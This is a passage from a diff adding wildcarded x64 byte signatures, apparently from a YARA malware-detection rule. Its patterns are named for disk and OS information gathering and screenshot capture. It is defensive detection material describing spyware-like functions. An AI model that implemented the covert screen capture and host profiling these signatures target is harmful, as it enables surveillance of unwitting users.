+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 85 F6 75 ?? 0F 57 C0 0F 11 03 4C 89 6B ?? 4C 89 6B ??
+            41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 90 48 8B 94 24 ?? ??
+            ?? ?? 48 83 FA ?? 0F 86 ?? ?? ?? ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B0 ?? 48 BF ?? ?? ?? ?? ?? ?? ?? ?? F2 44
+            0F 10 05 ?? ?? ?? ?? 88 44 24 ?? 3C ?? 0F 8F ?? ?? ?? ?? 0F BE D0 8D 4A ?? 0F B6 C1
+            0F A3 C6 0F 83 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7
+            44 24 ?? ?? ?? ?? ?? 0F B6 C2 88 44 24 ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15
+            ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 4C 89 AC
+            24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F 10 48 ??
+            0F 11 8C 24 ?? ?? ?? ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 41 83 CC ?? 44
+            89 64 24 ?? 48 8B 54 24 ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24
+        }
+		$get_disk_information_p2 = {
+            48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 48 0F 47 8C 24 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 8B D8 48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 48 0F 47 8C 24
+            ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ??
+            ?? ?? ?? 48 0F 47 8C 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ??
+            48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89
+            44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 0F 57 FF 48 85 C9 78 ?? F2
+            48 0F 2A F9 EB ?? 48 8B C1 48 D1 E8 83 E1 ?? 48 0B C1 F2 48 0F 2A F8 F2 0F 58 FF F2
+            41 0F 59 F8 48 8B 8C 24 ?? ?? ?? ?? 0F 57 F6 48 85 C9 78 ?? F2 48 0F 2A F1 EB ?? 48
+            8B C1 48 D1 E8 83 E1 ?? 48 0B C1 F2 48 0F 2A F0 F2 0F 58 F6 F2 41 0F 59 F0 33 D2 41
+            B8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 4C 8D 8C 24 ?? ?? ?? ?? 49 FF C9 B8 ?? ?? ?? ?? F7 E3 C1 EA ?? 0F B6 C2
+            C0 E0 ?? 8D 0C 10 02 C9 2A D9 80 C3 ?? 41 88 19 8B DA 85 D2 75 ?? 4C 8D 84 24 ?? ??
+            ?? ?? 49 8B D1 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 83 CC ?? 44 89 64 24 ?? 48
+        }
+		$get_disk_information_p3 = {
+            8B B4 24 ?? ?? ?? ?? 48 8B C7 48 2B C6 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D BC 24 ??
+            ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 4C 0F 47 BC 24 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24
+            ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 8D 76 ?? BF ?? ?? ??
+            ?? 48 8D 9C 24 ?? ?? ?? ?? 4C 3B F7 0F 86 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 B8 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 3B F8 76 ?? 48 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 83 C0
+            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 58 ?? 48 83 E3 ?? 48 89
+            43 ?? EB ?? 48 83 FF ?? B8 ?? ?? ?? ?? 48 0F 42 F8 48 8D 4F ?? 48 85 C9 75 ?? 49 8B
+            DD EB ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? EB ?? E8
+            ?? ?? ?? ?? 48 8B D8 48 89 9C 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 ??
+            ?? ?? ?? 4C 8B C6 49 8B D7 48 8B CB E8 ?? ?? ?? ?? 66 C7 04 33 ?? ?? 42 C6 04 33 ??
+            41 83 CC ?? 44 89 64 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 0F BA EC ?? 44 89 64 24 ?? 41 B8 ?? ?? ?? ?? 48 8D
+            15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 4C 89
+            6C 24 ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 44 24 ?? 0F 10 48 ?? 0F 11 4C 24 ??
+            4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 41 0F BA EC ?? 44 89 64 24 ?? 48 8D 84
+            24 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 49 FF C0 42 80 3C 00
+        }
+		$get_disk_information_p4 = {
+            75 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ??
+            ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ??
+            ?? ?? 0F 10 48 ?? 0F 11 8C 24 ?? ?? ?? ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00
+            ?? 41 0F BA EC ?? 44 89 64 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 0F
+            10 00 0F 11 44 24 ?? 0F 10 48 ?? 0F 11 4C 24 ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ??
+            C6 00 ?? 41 83 CC ?? 44 89 64 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ?? ?? 48 0F 47 54 24
+            ?? 4C 8B 44 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA
+            ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48
+            8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 6C
+            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ??
+            76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
+            ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
+            89 AC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48
+            8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ??
+            ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 44 24 ??
+            ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B
+        }
+		$get_disk_information_p5 = {
+            C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8
+            ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF
+            C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49
+            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 94 24
+            ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ??
+            ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 63 48 ?? 8B 84 0C ?? ?? ?? ?? 0F BA
+            F0 ?? 0F BA E8 ?? 89 84 0C ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 63 51 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 03 CA 48 8B
+            50 ?? FF 10 0F 28 CE 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 63 48 ?? 8B 84 0C ??
+            ?? ?? ?? 0F BA F0 ?? 0F BA E8 ?? 89 84 0C ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 63 51 ?? 48 8D 8C 24 ?? ?? ?? ??
+            48 03 CA 48 8B 50 ?? FF 10 0F 28 CF 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15
+            ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 44 24 ?? 4D 8B
+            CD 4C 89 6C 24 ?? 41 BA ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? C6 44 24 ?? ?? 41 0F BA
+        }
+		$get_disk_information_p6 = {
+            EC ?? 44 89 64 24 ?? 33 C0 0F 11 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B 8C 24
+            ?? ?? ?? ?? 8B C1 24 ?? 3C ?? 74 ?? 48 8B 84 24 ?? ?? ?? ?? 4C 8B 00 4D 85 C0 74 ??
+            48 8B 84 24 ?? ?? ?? ?? 48 8B 10 4C 3B 84 24 ?? ?? ?? ?? 4C 0F 42 84 24 ?? ?? ?? ??
+            4C 2B C2 EB ?? F6 C1 ?? 75 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 08 48 85 C9 74 ?? 48 8B
+            84 24 ?? ?? ?? ?? 48 8B 10 48 8B 84 24 ?? ?? ?? ?? 4C 63 00 4C 2B C2 4C 03 C1 EB ??
+            4C 8B 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8D 4C 24 ?? E8 ??
+            ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 0F BA F4 ?? 41 83 CC ?? 44 89 64
+            24 ?? 48 8D 54 24 ?? 49 83 FA ?? 48 0F 47 54 24 ?? 4D 8B C1 48 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ??
+            48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48
+            83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 BF ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48
+            8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48
+            2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
+            ?? 0F B6 44 24 ?? FE C0 8B B4 24
+        }
+		$get_os_information_p1 = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
+            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 48 89 4C 24 ??
+            33 F6 89 74 24 ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F
+            84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F
+            84 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? 48 8D 4C 24 ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 48 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 8B 54 24 ??
+            E8 ?? ?? ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 44
+            24 ?? 45 33 C9 45 33 C0 8B 54 24 ?? 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 48 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 8B 54 24 ?? E8 ?? ??
+            ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8D 54 24 ?? EB ?? 48
+        }
+		$get_os_information_p2 = {
+            8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 07 48 89 77
+            ?? 48 C7 47 ?? ?? ?? ?? ?? 66 89 37 C7 44 24 ?? ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 8B
+            C1 24 ?? 3C ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 8B 10 48 85 D2 74 ?? 48 8B 85 ?? ?? ??
+            ?? 4C 8B 08 48 3B 95 ?? ?? ?? ?? 48 0F 42 95 ?? ?? ?? ?? 49 2B D1 EB ?? F6 C1 ?? 75
+            ?? 48 8B 85 ?? ?? ?? ?? 48 8B 08 48 85 C9 74 ?? 48 8B 85 ?? ?? ?? ?? 4C 8B 08 48 8B
+            85 ?? ?? ?? ?? 48 63 10 48 03 D2 49 2B D1 48 03 D1 49 8B C1 48 D1 FA 48 85 C0 74 ??
+            48 8B CF 48 83 FA ?? 77 ?? 48 89 57 ?? 48 8D 1C 12 4C 8B C3 49 8B D1 E8 ?? ?? ?? ??
+            66 89 34 3B EB ?? E8 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C7 48
+            8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
+            73 ?? 49 8B 7B ?? 49 8B E3 5D C3
+        }
+		$take_screenshot_p1 = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 8B FA 33 DB 48 8B 05 ?? ?? ?? ?? 48
+            89 84 24 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 4C 8B F8 48 89 84 24 ?? ?? ?? ?? 48 8B
+            C8 FF 15 ?? ?? ?? ?? 48 8B F0 48 89 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 BC
+            ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? 44 8B A4 24 ?? ?? ?? ?? 44 8B AC 24 ?? ?? ?? ?? 45 8B C5 41 8B
+            D4 49 8B CF FF 15 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 48 89 84 24 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 4C 89 7C 24 ?? 44 89 6C 24 ??
+            45 8B CC 45 33 C0 33 D2 48 8B CE FF 15 ?? ?? ?? ?? 8B CF 41 0F AF CC B8 ?? ?? ?? ??
+            F7 E9 44 8B F2 41 D1 FE 41 8B CE C1 E9 ?? 44 03 F1 41 0F AF FD B8 ?? ?? ?? ?? F7 EF
+            8B F2 D1 FE 8B C6 C1 E8 ?? 03 F0 44 8B C6 41 8B D6 49 8B CF FF 15 ?? ?? ?? ?? 4C 8B
+            F8 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 49 8B D7 48 8B C8 FF 15 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 44 89 64 24 ?? 89 5C 24 ?? 89 5C 24 ??
+            48 8B 44 24 ?? 48 89 44 24 ?? 89 74 24 ?? 45 8B CE 45 33 C0 33 D2 48 8B CF FF 15 ??
+            ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ??
+            ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 84
+            24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 89 9C 24 ??
+            ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 8D 48 ?? FF 15 ?? ?? ??
+            ?? FF 47 ?? 48 8D 4F ?? FF 15 ?? ?? ?? ?? 90 4C 89 BC 24 ?? ?? ?? ?? 4C 8D 84 24 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 49 8B CF FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C6 84
+        }
+		$take_screenshot_p2 = {
+            24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ??
+            45 8B C8 41 F7 D9 45 0F 48 C8 44 89 8C 24 ?? ?? ?? ?? 0F B7 84 24 ?? ?? ?? ?? 89 84
+            24 ?? ?? ?? ?? 0F AF C1 83 C0 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? C1 E0 ?? 89 84 24 ?? ??
+            ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 45 85 C0 7E ?? 41 8D 49 ?? 0F
+            AF C8 48 63 D1 49 03 D2 48 89 94 24 ?? ?? ?? ?? F7 D8 89 84 24 ?? ?? ?? ?? EB ?? C6
+            84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
+            89 84 24 ?? ?? ?? ?? 0F B7 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 9C 24 ?? ?? ??
+            ?? 48 89 9C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            48 89 9C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ??
+            ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ??
+            ?? ?? 48 8B 01 45 33 C0 48 8D 94 24 ?? ?? ?? ?? FF 50 ?? 44 8B A4 24 ?? ?? ?? ?? 48
+            8B 8C 24 ?? ?? ?? ?? 48 8B 01 45 33 C9 45 33 C0 48 8B D3 FF 50 ?? 41 8B CC E8 ?? ??
+            ?? ?? 4C 8B E8 89 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 01 4C 8D 8C 24 ??
+            ?? ?? ?? 45 8B C4 49 8B D5 FF 50 ?? 4C 8D 8C 24 ?? ?? ?? ?? 45 8B C4 0F 1F 40 ?? 66
+            0F 1F 84 00 ?? ?? 00 00 49 FF C9 B8 ?? ?? ?? ?? 41 F7 E0 C1 EA ?? 0F B6 C2 C0 E0 ??
+            8D 0C 10 02 C9 44 2A C1 41 80 C0 ?? 45 88 01 44 8B C2 85 D2 75 ?? 4C 8D 84 24 ?? ??
+            ?? ?? 49 8B D1 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 4C 8B 44 24 ?? 48 8B 8C 24 ?? ?? ??
+            ?? 48 8B C1 49 2B C0 4C 8D 35 ?? ?? ?? ?? 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 49 8D 40 ??
+            48 89 44 24 ?? 48 8D 7C 24 ?? 48 83 F9 ?? 48 0F 47 7C 24 ?? 48 8D 05 ?? ?? ?? ?? 48
+            3B C7 76 ?? 4A 8D 04 07 4C 3B F0 77 ?? BE ?? ?? ?? ?? 49 3B FE 77 ?? 4C 8B FB EB
+        }
+		$take_screenshot_p3 = {
+            4C 8B FF 4D 2B FE EB ?? BE ?? ?? ?? ?? 44 8B FE 48 8D 4F ?? 49 FF C0 48 8B D7 E8 ??
+            ?? ?? ?? 4D 8B C7 49 8B D6 48 8B CF E8 ?? ?? ?? ?? 4A 8D 0C 3F 49 2B F7 49 8D 56 ??
+            49 03 D7 4C 8B C6 E8 ?? ?? ?? ?? 48 8D 44 24 ?? EB ?? BE ?? ?? ?? ?? 48 89 74 24 ??
+            4C 89 74 24 ?? 8B D6 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ??
+            48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F
+            10 48 ?? 0F 11 8C 24 ?? ?? ?? ?? 48 89 58 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 48 8B
+            94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ??
+            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 44 24 ?? ??
+            48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C3 4C 8B 8C 24
+            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 4D 85 C9 0F 84 ?? ?? ??
+            ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8
+            0F BE 0C 01 81 F9 ?? ?? ?? ?? 73 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8
+            80 3C 01 ?? 74 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8 80 3C 01 ?? 74 ??
+            48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8 48 8D 94 24 ?? ?? ?? ?? 48 83 BC 24
+            ?? ?? ?? ?? ?? 48 0F 47 94 24 ?? ?? ?? ?? 0F B6 0C 01 80 F1 ?? 88 0C 02 48 8B 94 24
+            ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 FF C0 49 3B C1 0F 82
+            ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 49 8B C0 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
+            ?? 4D 8B 40 ?? 49 2B C0 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? 49 8B C8 E8 ?? ??
+            ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 8C 24 ?? ?? ?? ?? 0F 11
+        }
+		$take_screenshot_p4 = {
+            8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 66 49 0F 7E C1 66 0F 73 D9 ?? 66 48 0F 7E
+            C8 48 83 F8 ?? 49 0F 47 D1 45 33 C9 41 B8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 8B C4 49 8B D5 48 8B 8C 24
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
+            ?? 48 8B 01 FF 50 ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 4C 24 ??
+            FF 15 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ??
+            ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 90 48 8B 94 24 ?? ?? ?? ??
+            48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72
+            ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8B F8 48 8D 48 ?? FF 15 ?? ?? ?? ?? 83 6F ?? ?? 75 ?? 48 8D 4F ?? FF 15 ?? ?? ?? ??
